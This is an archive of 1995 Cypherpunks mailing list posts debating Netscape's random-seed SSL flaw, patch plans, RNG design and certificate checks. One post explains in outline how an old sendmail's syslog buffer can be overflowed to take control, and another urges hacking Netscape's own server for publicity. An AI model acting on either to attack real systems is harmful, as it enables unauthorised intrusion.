206.42.112.96 >My Homepage >The Cyberdoc >*********************************************************************** >------------------ PGP.ZIP Part [017/713] ------------------- >M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M >MF=O0H+*%(-S%&>S%+FS&MPGD------------------------------------------------------------- >for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/ -- Dave Mandl dmandl at panix.com http://wfmu.org/~davem From m5 at dev.tivoli.com Sat Sep 23 08:32:13 1995 From: m5 at dev.tivoli.com (Mike McNally) Date: Sat, 23 Sep 95 08:32:13 PDT Subject: HEY!!! WAS: The Next Hack In-Reply-To: Message-ID: <9509231531.AA20035@alpha> David Mandl writes: > Looks like we've got a perfect candidate for the first Official > Cypherpunks Press Release, folks. Then sign me off. If something that inane were to go out with the word "cypherpunk" affixed to it, I'd cringe. It could only be worse if it ended with the catchphrase "hack the planet". [ David quoted the "Censored Girl": ] > >Hey wait a minute!!! > > > >You HAD stated a patch would be available by Friday. > >Now we are at early next week. > > > >I watched the stock rise in the face of bad facts. > >Almost 25% of your stock changed hands yesterday. So? > >For the moment, it seems to me, anyway, you're getting > >a lot of work done here for dirt cheap. I don't know > >cypher codes very well, but I know Wall St. codes really > >well. And THEY ARE BEING VIOLATED! I am glad there is no > >anonymity on Wall St. We are starting to get into the > >realm of SEC action. And I could really care much about > >what happens out on the list. I won't even dignify this by calling it speculation; it's simply and absolutely wrong. Any "Netscape insiders" are locked out; they couldn't manipulate the stock price if they wanted to, and if they have any brains in their heads at all they're absolutely the last people on earth who'd make a move that stupid. It won't be until January at the very earliest that anyone who holds restricted shares will be allowed to trade. The stock's in all likelihood being bounced back and forth between big technology funds, who don't give a rat's ass about some security bug in the product. > >That is the point of this. > >You can't really fix it. > >Most of us know it. Gee, I don't know that. > >The lies mount up > >on the stock price. Huh? Do you actually have any earthly idea how the market works? > >I normally couldn't care less, I'm a Coca-Cola trader. > >My stock is at an all time high as I write this. > >It's up over 1200% in 10 years. No one can match it. (even MSFT) > > > >This is much worse than NEW COKE! Ridiculous. > >Soon they will halt your stock trading if this keeps up. I'll eat my shoe if that happens. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) | | stand there and flap your arms like a fish. | Tivoli Systems, Austin TX | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From perry at piermont.com Sat Sep 23 08:43:53 1995 From: perry at piermont.com (Perry E. Metzger) Date: Sat, 23 Sep 95 08:43:53 PDT Subject: Seeds which depend on machine states In-Reply-To: <9509221519.AA19310@cantina.verity.com> Message-ID: <199509231543.LAA05907@frankenstein.piermont.com> Patrick Horgan writes: > > Try getting a human to type with the same timing, to microsecond > > precision, the same way twice. > > > That assumes that you have someway of measuring the timing to microsecond > precision. PCs have accurate microsecond timers. Perry From dmandl at panix.com Sat Sep 23 08:46:30 1995 From: dmandl at panix.com (David Mandl) Date: Sat, 23 Sep 95 08:46:30 PDT Subject: HEY!!! WAS: The Next Hack Message-ID: At 10:31 AM 9/23/95, Mike McNally wrote: >David Mandl writes: > > Looks like we've got a perfect candidate for the first Official > > Cypherpunks Press Release, folks. > >Then sign me off. If something that inane were to go out with the >word "cypherpunk" affixed to it, I'd cringe. It could only be worse >if it ended with the catchphrase "hack the planet". Sigh. In case there was any misunderstanding, it was a JOKE. I was making a comment about "Censored Girl's" loony-bin post as well as recent proposals that we should be issuing official press releases. Surely my subtle sense of humor isn't THAT subtle. Here: :-) --Dave. -- Dave Mandl dmandl at panix.com http://wfmu.org/~davem From kinney at bogart.Colorado.EDU Sat Sep 23 08:54:43 1995 From: kinney at bogart.Colorado.EDU (W. Kinney) Date: Sat, 23 Sep 95 08:54:43 PDT Subject: MacRandoms Message-ID: <199509231554.JAA16098@bogart.Colorado.EDU> I tried posting this a few days ago, but it evidently got lost because of the problems with the list. Anyway, I've uploaded my random number generator number generation code for the Mac to: ftp://ftp.csua.berkeley.edu/pub/cypherpunks/randomness/MacRandoms.sea.hqx This file contains Colin Plumb's randpool code, my Macintosh wrapper for it, and a nice 68K assembler implementation of MD5 as a bonus. Enjoy. -- Will From m5 at dev.tivoli.com Sat Sep 23 09:01:16 1995 From: m5 at dev.tivoli.com (Mike McNally) Date: Sat, 23 Sep 95 09:01:16 PDT Subject: HEY!!! WAS: The Next Hack In-Reply-To: Message-ID: <9509231600.AA20401@alpha> David Mandl writes: > Sigh. In case there was any misunderstanding, it was a JOKE. I was making > a comment about "Censored Girl's" loony-bin post as well as recent > proposals that we should be issuing official press releases. Surely my > subtle sense of humor isn't THAT subtle. Here: Sorry. Caffeine deficit. (Plus the added sensitivity of living in the bizarre atmosphere of a recently-gone-public company.) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) | | stand there and flap your arms like a fish. | Tivoli Systems, Austin TX | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From carolann at censored.org Sat Sep 23 09:16:03 1995 From: carolann at censored.org (Censored Girls Anonymous) Date: Sat, 23 Sep 95 09:16:03 PDT Subject: ? Me? Message-ID: <199509231615.JAA02784@usr3.primenet.com> What? Me? Write a Cypherpunks Press Release? Love Always, Alfreda E. Newman -- Member Internet Society - Certified BETSI Programmer - Webmistress *********************************************************************** Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 My Homepage The Cyberdoc *********************************************************************** ------------------ PGP.ZIP Part [017/713] ------------------- M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M MF=O0H+*%(-S%&>S%+FS& http://dcs.ex.ac.uk/~aba/export/ From carolann at censored.org Sat Sep 23 09:19:39 1995 From: carolann at censored.org (Censored Girls Anonymous) Date: Sat, 23 Sep 95 09:19:39 PDT Subject: Step One: We admitted Message-ID: <199509231619.JAA15885@usr1.primenet.com> We admitted we were powerless over the prospect of a Cypherpunk Press Release. That our coding had become unmanageable....... Love Always, Carol Anne Coketrader -- Member Internet Society - Certified BETSI Programmer - Webmistress *********************************************************************** Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 My Homepage The Cyberdoc *********************************************************************** ------------------ PGP.ZIP Part [017/713] ------------------- M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M MF=O0H+*%(-S%&>S%+FS& http://dcs.ex.ac.uk/~aba/export/ From alano at teleport.com Sat Sep 23 09:31:19 1995 From: alano at teleport.com (Alan Olsen) Date: Sat, 23 Sep 95 09:31:19 PDT Subject: Message-ID: <199509231631.JAA17499@desiree.teleport.com> At 03:15 PM 9/23/95 DST, you wrote: >Again, we're Spammed by a moron. >Time to fire up the old remailers! >[At least they do this on weekends, when we have >time for creative revenge!] Hehehehehe... Either that or someone left their terminal logged in. The only better way to assure a quick and painful death would have been to post them to a Black Panther's mailing list. Oh well... Evolution in action! | Minister of Forced Caffinization in the DNRC | alano at teleport.com | |"The moral PGP Diffie taught Zimmerman unites all| Disclaimer: | | mankind free in one-key-steganography-privacy!" | Ignore the man | | -- PGP 2.6.2 key available on request -- | behind the keyboard.| | http://www.teleport.com/~alano | | From bianco at itribe.net Sat Sep 23 10:41:57 1995 From: bianco at itribe.net (David J. Bianco) Date: Sat, 23 Sep 95 10:41:57 PDT Subject: SSL Man-in-the-middle In-Reply-To: <199509221407.KAA23176@gatekeeper.itribe.net> Message-ID: <199509231738.NAA25269@gatekeeper.itribe.net> On Sep 22, 10:10, David J. Bianco sent the following to the NSA's mail archives: > Subject: SSL Man-in-the-middle || I've read through the SSL spec, and it provides authentication for both || the server and the client, but these features are rarely used, probably || because they are somewhat inconvenient for the user. A good first step || would be to include the IP address of the server in the certificate || signed by VeriSign. In this way, browsers could perform automatic checks || that the IP address in the certificate is actually the one that's being || communicated with. This does raise other questions (such as protecting || from IP spoofing), but IMHO would be a good way of providing an automatic || "first check" without inconveniencing users. The added inconvenience of || obtaining a new certificate when your server's IP address changes is || fairly minor, and could be viewed as necessary overhead for doing secure || transactions via the Net. || || Of course, the above is complete and utter crap (as Simon Spero pointed out to me in much, much more polite terms 8-). Let me take a stab at v2.0: I've read through the SSL spec, and it provides authentication for both the server and the client, though these features are rarely used, probably because they are somewhat inconvenient for the user. A good practice would be to always code your SSL app to check that the CN (Common Name) field of the certificate is the same as the hostname listed in the URL (CN always appears to be an IP address, at least for Netscape server certificates). Still, even with the bogus last paragraph, I stand by the rest of my post. I obviously haven't seen Netscape source, so I don't really know what checks it might have, but none of the other SSL apps I've seen have an auto-check feature, though it doesn't seem to be much more trouble at all. -- ========================================================================== David J. Bianco | Web Wonders, Online Oddities, Cool Stuff iTribe, Inc. | Phone: (804) 446-9060 Fax: (804) 446-9061 Suite 1700, World Trade Center | email: Norfolk, VA 23510 | URL : http://www.itribe.net/~bianco/ From joelm at eskimo.com Sat Sep 23 11:24:07 1995 From: joelm at eskimo.com (Joel McNamara) Date: Sat, 23 Sep 95 11:24:07 PDT Subject: Seattle Cypherpunks Message-ID: <199509231823.LAA15147@mail.eskimo.com> Seattle-area Cypherpunks Get Together Thursday, September 28 7:30 PM Seattle Center House/Food Circus Entrance opposite the Flag Pavillion look for a table with a Compaq laptop busily signing keys This is a very informal, unstructured get together. More of a chance to meet other folks with similar interests. With all of the recent activities in crypto-land, I'm sure there will be lots to talk about. Bring a disk with your key so I can put my ancient 386 laptop to some good use. I'll also load up some relatively new Windows crypto software for show and tell. Eastsiders (Bellevue/Redmond environs) that don't feel like braving the bridge, let me know. I've got a van and will be headed west from Carnation and would be happy to car-pool. Hope to see you there... Joel McNamara joelm at eskimo.com - http://www.eskimo.com/~joelm for PGP key Thomas Jefferson used strong crypto, shouldn't you? From perry at piermont.com Sat Sep 23 11:31:54 1995 From: perry at piermont.com (Perry E. Metzger) Date: Sat, 23 Sep 95 11:31:54 PDT Subject: netscape bug In-Reply-To: <199509230003.RAA06024@orac.engr.sgi.com> Message-ID: <199509231831.OAA06104@frankenstein.piermont.com> Tom Weinstein writes: > In article , "Perry E. Metzger" writes: > > > I can tell you in general terms -- I don't write MIPS assembler > > myself. However, I will point out to you that you use an ancient > > Sendmail, and that it uses syslog(3) on user produced data, and that > > syslog uses a static buffer. Trick sendmail into logging something > > very big, and you can do what you like. The 8lgm people wrote a demo > > for Sparc as a proof of concept. > > Hmm, after having looked at the syslogd code, it looks like this > particular bug has been fixed for at least several years. I said syslog(3), not syslogd(8). The bug is in the client, not the server. Yes, you suffer from it. Go and check. > However, there sure are a hell of a lot of fixed size buffers being > alocated off the stack and some of them are being used in unsafe > ways. Perry From sameer at c2.org Sat Sep 23 12:19:44 1995 From: sameer at c2.org (sameer) Date: Sat, 23 Sep 95 12:19:44 PDT Subject: "Going after Netscape" In-Reply-To: Message-ID: <199509231914.MAA01326@infinity.c2.org> > So, keep on "attacking" Netscape (kudos to Ray, by the way, though I've > seen Netscape bomb on certain sites, as with the Cypherpunks archive site, > as several of us noted a few months ago...probably a different problem, but > indicative that Netscape can be corrupted). But let's be careful not to > convey any flavor of this being a vendetta. I agree. The goal is not to kill Netscape but to make the net secure. -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From sameer at c2.org Sat Sep 23 12:24:16 1995 From: sameer at c2.org (sameer) Date: Sat, 23 Sep 95 12:24:16 PDT Subject: The Next Hack In-Reply-To: <4407p5$on4@tera.mcom.com> Message-ID: <199509231919.MAA01818@infinity.c2.org> > > What exactly is the point of this? We have: Is Netscape going to cover the cost of getting the new keys that the servers generate signed and certified by Versign? Is netscape going to tell its customers that they need to regenerate their keys and get new certificates? Like I've said, I'm very impressed with netscape's quick response and almost everything they've done. -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From sameer at c2.org Sat Sep 23 12:28:53 1995 From: sameer at c2.org (sameer) Date: Sat, 23 Sep 95 12:28:53 PDT Subject: HEY!!! WAS: The Next Hack In-Reply-To: <199509231217.FAA27504@usr1.primenet.com> Message-ID: <199509231923.MAA02185@infinity.c2.org> > You HAD stated a patch would be available by Friday. > Now we are at early next week. I'd rather wait a few days for a good patch than have a bad, untested patch available earlier. -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From perry at piermont.com Sat Sep 23 12:35:32 1995 From: perry at piermont.com (Perry E. Metzger) Date: Sat, 23 Sep 95 12:35:32 PDT Subject: Why I haven't begun to be nasty to Netscape (was Re: The Next Hack) In-Reply-To: <4407p5$on4@tera.mcom.com> Message-ID: <199509231935.PAA06187@frankenstein.piermont.com> Jeff Weinstein writes: > What else do you hope to gain by breaking a server key? I think > the point has been made. Is there anything else that you would > reasonably expect that we would do in response to a server key > being broken that we have not already done? Well, I don't know what the point was -- I don't think its a useful effort -- but I would like to make the following comment. One problem I've had is that this isn't some toy being built at NCSA any more -- its something that lots of real money depends on. If I treated my security critical code for my wall street clients the way you guys have treated a lot of your code, I'd expect to be blackballed and never work at anything more lucrative than shoe-shining again in my entire carrer. You've all been giving the very standard "We're overworked -- we didn't know -- I didn't look at that" sort of answers. Thats all fine and well -- but when the money gets stolen or the plane crashes it isn't good enough. Code like this has to be treated with enormous seriousness. That means code reviews. That means people follow systematic security proceedures -- and thats not just in the "security code" because that isn't where the break will come. It means that there are coding standards. It means people break their backs very very seriously checking everything and rechecking it, and then torture testing it. You folks are still operating as if you are a garage operation when it comes to this stuff, even though you are selling commerce servers that people depend on for their business to operate. You guys have gotten off quite lightly -- you screw up in a way that could have cost your clients real money and all that happened is some bad press and pressure to fix things. However, don't expect to be treated that well next time. Those of us who are adults in this business expect that we won't get second chances if we fuck a client good and hard, and you guys shouldn't feel as though you've got another couple of strikes to go. As I said, if I fucked up that way I'd expect to have my carrer permanently ruined. You got off *easy*. In my part of the universe, which is very close to the part you guys have started to tread in, people treat this stuff very seriously. As it happens, I know of some places in the financial community where people have started to act lazy. I'm expecting to see lots of people lose their carrers when something bad happens. Perry From sryan at reading.com Sat Sep 23 12:49:22 1995 From: sryan at reading.com (steven ryan) Date: Sat, 23 Sep 95 12:49:22 PDT Subject: macworld crypto articles Message-ID: <199509231949.PAA23337@zork.tiac.net> The current (11/95) issue of MACWORLD magazine has two good crypto articles in it. 1 - Protect your E-Mail by Bruce Schneier Good introduction for neophytes, the basic how and why. Get some reprints and give them away with PGP to your nonCypherpunk computer friends. 2 - False Security by Gene Steinberg They searched for an applications programmer *UN*skilled at cryptography to try and crack the password protection of the 8 best selling Mac programs. Quicken 5.0 was cracked in 5 minutes. Adobe Acrobat in 2 hours. Steven Ryan sryan at reading.com From shamrock at netcom.com Sat Sep 23 13:05:49 1995 From: shamrock at netcom.com (Lucky Green) Date: Sat, 23 Sep 95 13:05:49 PDT Subject: "Going after Netscape" Message-ID: <199509232003.QAA11668@book.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article <199509231914.MAA01326 at infinity.c2.org>, sameer at c2.org (sameer) wrote: >> So, keep on "attacking" Netscape (kudos to Ray, by the way, though I've >> seen Netscape bomb on certain sites, as with the Cypherpunks archive site, >> as several of us noted a few months ago...probably a different problem, but >> indicative that Netscape can be corrupted). But let's be careful not to >> convey any flavor of this being a vendetta. > > I agree. The goal is not to kill Netscape but to make the net >secure. Absolutely. We aren't on a vendetta. We want to make the net secure for privacy. If hacking a Netscape server will help that goal, surely Netsape's own would be the most appropriate server to try, since it will generate the largest exposure in the press and thereby the strongest motivation for Netscape to fix the hole. - -- - -- Lucky Green PGP encrypted mail preferred. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMGRoHyoZzwIn1bdtAQHJCgF9FbuTP1VBbzGJANFX48hvje4V7pzhyEaQ ItXGdXHCPbxjKbQ0bLApkt4yTtHJREMk =wEyv -----END PGP SIGNATURE----- From shamrock at netcom.com Sat Sep 23 13:07:26 1995 From: shamrock at netcom.com (Lucky Green) Date: Sat, 23 Sep 95 13:07:26 PDT Subject: The Next Hack Message-ID: <199509232005.QAA11679@book.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article <199509231919.MAA01818 at infinity.c2.org>, sameer at c2.org (sameer) wrote: >> >> What exactly is the point of this? We have: > > Is Netscape going to cover the cost of getting the new keys >that the servers generate signed and certified by Versign? Is netscape >going to tell its customers that they need to regenerate their >keys and get new certificates? > > Like I've said, I'm very impressed with netscape's quick >response and almost everything they've done. I would be even more impressed if Netscape made their code publicly available for examination. - -- - -- Lucky Green PGP encrypted mail preferred. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMGRoeyoZzwIn1bdtAQGg4wF/XTLT2U7mXi2MZ5pgSZQMd9VdLZJcp5MD wgBWaGCNIzsQnkwB4ZkTyjJAOwFf0OkJ =+ZRt -----END PGP SIGNATURE----- From jsw at neon.netscape.com Sat Sep 23 13:44:23 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Sat, 23 Sep 95 13:44:23 PDT Subject: HEY!!! WAS: The Next Hack In-Reply-To: <199509231217.FAA27504@usr1.primenet.com> Message-ID: <441rhh$bpi@tera.mcom.com> In article <199509231217.FAA27504 at usr1.primenet.com>, carolann at censored.org (Censored Girls Anonymous) writes: > You HAD stated a patch would be available by Friday. > Now we are at early next week. This is what our press release said: An updated version of Netscape Navigator 1.1 for Mac OS and Unix and Netscape Navigator 1.2 for Windows 3.1 and Windows 95 will be available for downloading by existing customers on the Internet next week. There is still a link to it on our home page. All press accounts I've seen (this is not exhaustive!!) have also said early next week. I don't have an archive of every message I've sent to this list, so I can't check myself, but if I somehow led you to believe that the fix would be out friday, then I apologize. You can look at this url for the official company statement: http://home.netscape.com/newsref/std/random_seed_security.html --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From jsw at neon.netscape.com Sat Sep 23 13:57:18 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Sat, 23 Sep 95 13:57:18 PDT Subject: The Next Hack In-Reply-To: <4407p5$on4@tera.mcom.com> Message-ID: <441s9c$for@tera.mcom.com> In article <199509231919.MAA01818 at infinity.c2.org>, sameer at c2.org (sameer) writes: > > > > What exactly is the point of this? We have: > > Is Netscape going to cover the cost of getting the new keys > that the servers generate signed and certified by Versign? Is netscape > going to tell its customers that they need to regenerate their > keys and get new certificates? I'm not sure what exactly you mean by "cover the cost". Our server customers WILL NOT have to pay verisign for new certificates. We will tell all of our customers to generate new keys and get new certificates ASAP. We are putting the version number in new certificate requests so that verisign can reject requests from people who don't have the new version of the key generator. Server operators will also be able to set up their servers to detect unpatched clients and redirect them to a page that will allow them to download the patch. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From jamesd at echeque.com Sat Sep 23 14:08:32 1995 From: jamesd at echeque.com (James A. Donald) Date: Sat, 23 Sep 95 14:08:32 PDT Subject: Project: a standard cell random number generator Message-ID: <199509232108.OAA17020@blob.best.net> At 11:52 AM 9/22/95 -0700, David G. Koontz wrote: > If NSA requires real stochastic results for military crypto, what would > we as casual cryptographers feel comfortable with? The Netscape episode > shows the comfort level needs improving. > > How good is good enough? 128 bits of true entropy, in your RNG seed, and never leaked is good enough. (You one way hash the RNG numbers generated, to avoid leaking any information about your internal RNG state.) Your RNG number must of course be based on the full seed, not on some 16 bit subset of the seed. To be on the safe side, you might use 128 bytes of seed, or 4K bytes of seed, just because gross overkill is cheap, and it is kind of nice to have a seed larger than any random numbers you might really need. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From wb8foz at nrk.com Sat Sep 23 15:42:33 1995 From: wb8foz at nrk.com (David Lesher) Date: Sat, 23 Sep 95 15:42:33 PDT Subject: "random" number seeds vs. Netscape In-Reply-To: <9509221532.AA19315@cantina.verity.com> Message-ID: <199509232229.SAA00612@nrk.com> As a hardware type, I'd prefer a diode noise generator over a radioactivity detector. I'd hate for the Fort to be tempted to fudge the latter's output by flooding my house from a black helicopter... But lacking same.... Can you take the time between two effectively async events, and use the low order bits of same? For example, time between a netverk pack arriving and the next tick of the TOD clock? And/or the system's disk IO or such? Or: Choose a site at random. Ping it. Use low order bits of that time with something above. I'm sure most such schemes are not usable. But all it takes is one... -- A host is a host from coast to coast.................wb8foz at nrk.com & no one will talk to a host that's close........[v].(301) 56-LINUX Unless the host (that isn't close).........................pob 1433 is busy, hung or dead....................................20915-1433 From stewarts at ix.netcom.com Sat Sep 23 15:54:15 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Sat, 23 Sep 95 15:54:15 PDT Subject: The Fortezza random number generator is not trustworthy Message-ID: <199509232254.PAA11243@ix8.ix.netcom.com> A nice addition to any Netscape RNG hacks is the comment that, while Netscape may have a bug in their RNG, it's detectable and fixable; the NSA may have a BUG in theirs, and only they'll know for sure... >> Yes Fortezza cards can be instructed to produce a random number through one >> of its library calls (someday they'll have a real API). One of the >> diagnostic tools I had tested this function. What algorithm do they use? >> Haven't a clue. Sources say that the RNG implementation may vary from vendor >> to vendor (i.e., GTC, Spyrus, Mykotronix, etc.). John Gilmore's comments on CAPSTONE, subliminal channels, and FOIA blackouts certainly add depth to this suspiciousness. I'd initially not been too worried about the Fortezza (besides the obvious Master Key problems) because the NSA is letting the military use them for Defense Messaging Service. However, if the RNG might be different for different vendors, the non-military versions may be using a weak RNG, which the NSA has a backdoor to. Alternatively, the RNGs may all be the same, but there may be an option that the military can use to get full-strength random numbers while the public, not knowing this, gets weakened ones (e.g. the first n bits of the RNG may be random, and the next N-n bits may be a strong hash, while there are N-n real random bits in another register if you ask for them nicely.) On a technical note, I would have thought that Fortezza and/or CAPSTONE used some sort of hardware RNG, i.e. noisy Zener diodes or whatever. I've seen it mentioned on this list that some other NSA secure phones, such as STU-III, do that. #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From shamrock at netcom.com Sat Sep 23 16:01:07 1995 From: shamrock at netcom.com (Lucky Green) Date: Sat, 23 Sep 95 16:01:07 PDT Subject: Need Pathfinder "Cypherpunks" password Message-ID: <199509232259.SAA12058@book.hks.net> -----BEGIN PGP SIGNED MESSAGE----- What is the Cypherpunks password to be used with Pathfinder, Time-Warner's web site? TIA, - -- - -- Lucky Green PGP encrypted mail preferred. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMGSROioZzwIn1bdtAQHi2AGAi18zy9bn/EvI65yoyqAPcQonmp3gaB7y Di2Jqq0KLUZFR4fzvwxoM4ZVWNfafQ7r =wBeD -----END PGP SIGNATURE----- From WSJ-ANNOUNCE at LIME.EASE.LSOFT.COM Sat Sep 23 16:39:16 1995 From: WSJ-ANNOUNCE at LIME.EASE.LSOFT.COM (Money & Investing Update) Date: Sat, 23 Sep 95 16:39:16 PDT Subject: Important Announcement from Money & Investing Update Message-ID: <9509232338.AA15228@toad.com> The Wall Street Journal's Money & Investing Update (http://update.wsj.com) has now introduced Company Briefing Books, a major product enhancement that enables Update readers to get a rich, up-to-the-minute background report on any company in the news. Briefing Books are highly graphical compilations of recent news, stock charts, and financial data, available on more than 6,500 U.S. and international companies. They include news from The Wall Street Journal and Dow Jones newswires, as well as background reports and performance data from other leading information sources. Money & Investing Update editors now include direct hyperlinks to Briefing Books from nearly every significant mention of a company in Update stories and tables. In addition, readers can ask for a Briefing Book on a company of their choosing at any time simply by entering a company name or stock symbol. The Money & Investing Update is at http://update.wsj.com. If you haven't read the Update in a while, please try this important new feature. You can go directly to a Briefing Book request form at this URL: http://update.wsj.com/briefingbook/inap/search.html. Best wishes, The Editors and Staff of Money & Investing Update ---------------------- For further information, contact us at info at update.wsj.com or call customer support at 1-800-369-2834. If you would prefer not to receive any future email from the Money & Investing Update please send email to "LISTSERV at PEACH.EASE.LSOFT.COM" In the body of your message please type "UNSUBSCRIBE WSJ-ANNOUNCE" From stewarts at ix.netcom.com Sat Sep 23 17:30:41 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Sat, 23 Sep 95 17:30:41 PDT Subject: "random" number seeds vs. Netscape Message-ID: <199509240029.RAA22318@ix8.ix.netcom.com> At 06:29 PM 9/23/95 -0400, you wrote: >Can you take the time between two effectively async events, and use the >low order bits of same? >For example, time between a netverk pack arriving and the next tick of >the TOD clock? And/or the system's disk IO or such? You might get some entropy there, but you can get more (though perhaps not measurably more) by using the values of both instead. For instance rand = MD5(rand, lowbits(T(clock) - T(packet))) vs rand = MD5(rand, T(clock), T(packet)) As long as you're not overoptimistic about how many real bits you've gotten, might as well actually use the version that keeps more low-quality bits than try to improve them. Also, do watch out for things that aren't really asynchronous, e.g. the next clock tick will probably happen at some even multiple of 1000000/Hz microseconds. #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From A00467 at servicom.es Sat Sep 23 18:33:57 1995 From: A00467 at servicom.es (Xavier Naveira) Date: Sat, 23 Sep 95 18:33:57 PDT Subject: Hello Message-ID: <43p9kj$7fh@sparky.servicom.es> Hello!!!! From paquin at netscape.com Sat Sep 23 19:09:40 1995 From: paquin at netscape.com (Tom Paquin) Date: Sat, 23 Sep 95 19:09:40 PDT Subject: Netscape for Linux? In-Reply-To: <43tmht$qfe@tera.mcom.com> Message-ID: <3064BDFB.717F@netscape.com> > And the sad part is that now that they have announced that they are > dropping their unofficial Linux support, I have no current plans to alter our treatment of Linux. It is not now, nor has it ever been, a supported platform. We do build for it, and some people are happy about that. I have not constructed a business case which would cause Netscape to begin support for Linux versions of the Navigator. Right now, I'm not sure that making a point of this would do what you want. Either of the two above paragraphs could be changed with time. -- Tom Paquin +1(415)528-2607 fax +1(415)528-4122 Netscape Communications 501 E Middlefield Mt View, CA 94043 USA PS. I think that you are all doing a really great job! From hshubs at BIX.com Sat Sep 23 20:08:29 1995 From: hshubs at BIX.com (hshubs at BIX.com) Date: Sat, 23 Sep 95 20:08:29 PDT Subject: Cypherpunks Lite Message-ID: <9509232307.memo.6018@BIX.com> Would the person who does this, or someone who can point me at him, contact me via e-mail please? From sunder at dorsai.dorsai.org Sat Sep 23 20:30:36 1995 From: sunder at dorsai.dorsai.org (Ray Arachelian) Date: Sat, 23 Sep 95 20:30:36 PDT Subject: Cypherpunks Lite In-Reply-To: <9509232307.memo.6018@BIX.com> Message-ID: On Sat, 23 Sep 1995 hshubs at BIX.com wrote: > Would the person who does this, or someone who can point me at him, contact > me via e-mail please? I don't run the actual Cypherpunks Lite list, however I do run a free filtering service of the same sort... basically stick to news and technical stuff, as well as other miscalenous interesting stuff, but don't forward whole threads, or flames, etc... If you want in, let me know in email and I'll add you to the list. ========================================================================== + ^ + | Ray Arachelian | Amerika: The land of the Freeh. | _ |> \|/ |sunder at dorsai.org| Where day by day, yet another | \ | <--+-->| | Constitutional right vanishes. | \| /|\ | Just Say | | <|\ + v + | "No" to the NSA!| Jail the censor, not the author!| <| n ========================================================================== From cjs at netcom.com Sat Sep 23 20:50:08 1995 From: cjs at netcom.com (Christopher J. Shaulis) Date: Sat, 23 Sep 95 20:50:08 PDT Subject: Netscape for Linux? In-Reply-To: <3064BDFB.717F@netscape.com> Message-ID: <199509240243.WAA00266@hoopsnake.cjs.net> > > And the sad part is that now that they have announced that they are > > dropping their unofficial Linux support, > > I have no current plans to alter our treatment of Linux. It is not now, > nor has it ever been, a supported platform. We do build for it, > and some people are happy about that. > > I have not constructed a business case which would cause Netscape > to begin support for Linux versions of the Navigator. Right now, I'm > not sure that making a point of this would do what you want. I'll say some people are happy about it. You just recently turned down an order for 230 copies of the netscape navigator for Linux, and as you folks aren't making any money, you can only wonder why. You have also turned numerous other attempts by varionus people to buy both quantities of navigaors and server software for Linux. It seems to me that you folks are going out of your way to deny the fact that the Linux market exists. I think that its because you are embarassed that all these people with a $20 operating system are throwing money at you while all the folks with $10K operating systems aren't talking to you at all. While you may WANT to have all your sales be for OSF/1 machines or solaris, but refusing to support Linux and ignoring the demand for your products by the Linux community just because you don't think it would sound as impressive, is actually quite childish and doesn't make any financial sense. Christopher From stewarts at ix.netcom.com Sat Sep 23 21:38:27 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Sat, 23 Sep 95 21:38:27 PDT Subject: Netscape for Linux? Message-ID: <199509240436.VAA28304@ix5.ix.netcom.com> At 10:42 PM 9/23/95 -0400, you wrote: >It seems to me that you folks are going out of your way to deny the >fact that the Linux market exists. I think that its because you are >embarassed that all these people 